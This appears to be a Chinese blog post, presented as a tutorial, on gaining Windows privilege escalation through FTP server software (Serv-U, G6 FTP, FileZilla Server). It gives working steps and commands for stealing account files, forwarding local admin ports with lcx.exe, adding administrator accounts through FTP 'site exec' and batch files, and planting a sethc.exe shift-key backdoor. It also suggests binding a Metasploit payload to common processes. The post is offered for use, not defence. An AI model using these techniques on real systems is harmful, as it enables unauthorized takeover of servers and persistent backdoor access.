2. 技术
    3. 002--第三方软件提权之FTP软件

    002--第三方软件提权之FTP软件

    技术2024-12-25  20

    server_U 提权

    对于不可写权限,serv_u 6.4以下的,如果默认密码没有修改的,直接可以提权。serv_u 7以上的可以修改下脚本提权目录,不要用默认的C盘,改在其他盘符用脚本提权。serv-u的默认端口是43958,密码文件的安装目录 c:\Program Files\Serv-u\SerUDaemon.ini 一、读取配置文件 1.server-u默认安装目录下的ServUDaemon.ini文件记录着所有的ftp账号信息(32位默认安装路径C:\Program Files (x86)\RhinoSoft.com\Serv-U\ServUDaemon.ini),拿到密码可以直接拿去md5解密 2.如果有权限修改ServUDaemon.ini文件,可直接增加高权限ftp用户。添加账号的password值是加盐md5加密后的值(例如:盐是cq,就md5加密cq123456,然后Password=cq+md5(cq123456) 3.如果得到的ftp账号权限是管理权限,可直接ftp登录执行命令创建用户

    quote site exec net user test test123 /add quote site exec net localgroup administrators test /add

    如图用户创建成功,而且是管理员权限

    方法二、大马通过server-u的管理员账号创建新的ftp账号,然后用大马创建的账号登录进行提取## 方法三、直接提权 server-u的管理员账号权限较大,相当于系统权限,可以通过管理员账号直接创建用户,并且加入到管理员组。 如果server-U 用户默认密码被修改了,下载ServUAdmin.exe文件用c32打开就可以找到账号及密码,注意使用迅雷可能会出现问题,建议直接用浏览器下载

    G6 ftp提权ftp

    G6ftp安装目录下remoteadmin/remote.ini文件包含有账号信息,可通过解密得到账号密码,有修改权限也可以直接修改或添加用户 g6ftp默认监听在127.0.0.1的8021端口上,所以需要使用lcx 工具将该端口转发出去。如果无法执行cmd命令,需要在可读可写目录上传cmd和lcx等程序,然后才能进行端口转发 1.端口转发

    lcx.exe -tran 8222 127.0.0.1 8021 #转发127.0.0.1 8021端口到全IP 8222端口

    在服务器里面查看。确定已经转发成功 2.远程登录 端口转发完成后,直接使用g6ftp客户端以管理员用户远程登录软件。这里分别填入转发后的端口已经在最开始得到的用户名及密码 连接成功 3.创建ftp用户 设置用户家目录 给该账号所有权限 4.新建批处理命令,分别填入命令名称以及要执行的批处理文件路径 5.通过新建的ftp用户上传文件1.bat

    #批处理文件内容 net user ftptest 123.com /add net localgroup administrators ftptest /add

    6.执行批处理命令,客户端会加载支持此批处理

    quote site useradd

    7.提权成功,新建了ftptest账户,且为管理员权限

    filezilla提权

    filezilla是一款开源的FTP服务器和客户端的软件。若安装了服务器端默认只侦听127.0.0.1的14147端口。并且默认安装目录目录下有两个敏感文件 filezilla server.xml(包含了用户信息)和filezilla server interface.xml(包含了管理信息) C:\Program Files\FileZilla Server\FileZilla Server Interface.xml 提权思路: 1.下载这个两个文件,拿到管理密码 2.配置端口转发,登录远程管理ftp server 提权步骤: 1.端口转发

    C:\Inetpub\wwwroot\8099\lcx.exe -tran 14148 127.0.0.1 14147

    2.远程连接 转发完成后使用filezilla 服务端软件远程连接,登录成功 3.创建ftp用户 4.设置密码 5.设置家目录及控制权限 6. 使用filezilla客户端远程连接成功 7.使用cmd.exe改名为sethc.exe替换c:\windows\system32\sethc.exe生成shift后门 8.连接3389按5次shift 调出cmd.exe

    taskmgr # 调用任务管理器 explorer.exe # 调用桌面 net user test 123.com /add net localgroup administrators test /add #创建用户

    注意:高版本服务器进不了登录界面,无法利用五次shift弹出cmd.exe。可以利用msf生成payload捆绑到目标cmd.exe/explorer.exe(经常使用的进程)上等待目标上线。然后进行提权

    Processed: 0.011, SQL: 9